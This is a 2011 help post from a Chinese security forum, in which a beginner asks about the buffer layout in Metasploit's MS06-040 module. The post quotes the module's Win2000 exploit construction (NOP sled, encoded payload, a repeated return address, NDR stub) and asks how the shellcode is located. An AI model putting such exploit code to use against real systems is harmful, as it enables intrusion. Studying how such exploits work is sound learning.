-
-
[旧帖]
[求助]关于metasploit中ms6-040脚本的疑问
0.00雪花
-
2011-6-9 17:06
4120
-
[旧帖] [求助]关于metasploit中ms6-040脚本的疑问
0.00雪花
win2000的数据构造如下:
code = make_nops(mytarget['Offset'] - payload.encoded.length) + payload.encoded
path = code + ( [mytarget.ret].pack('V') * 16 ) + "\x00\x00"
stub = NDR.long(rand(0xffffffff)) +
NDR.UnicodeConformantVaryingString('') +
NDR.UnicodeConformantVaryingStringPreBuilt(path) +
NDR.long(rand(250)+1) +
NDR.UnicodeConformantVaryingStringPreBuilt("\xeb\x02\x00\x00") +
NDR.long(rand(250)+1) +
NDR.long(0)
其中:'Offset' => 1000,
'Ret' => 0x00020804
这个缓冲区漏洞的布置方式和failwest的布置方式有很大不同,本人是新手,所以不是很明白,有两个问题:(1)它采取得shellcode定位方式是啥?也就是0x00020804代表什么?为什么布置这么多返回地址,感觉也没有增加命中率啊。
(2)参数4和参数1的长度为1000+16*4+4=1068=0x42C,相当于把后面五个输入参数全部覆盖了,为什么要覆盖这五个参数?感觉没什么作用啊?
[培训]《安卓高级研修班(网课)》月薪三万计划,掌
握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法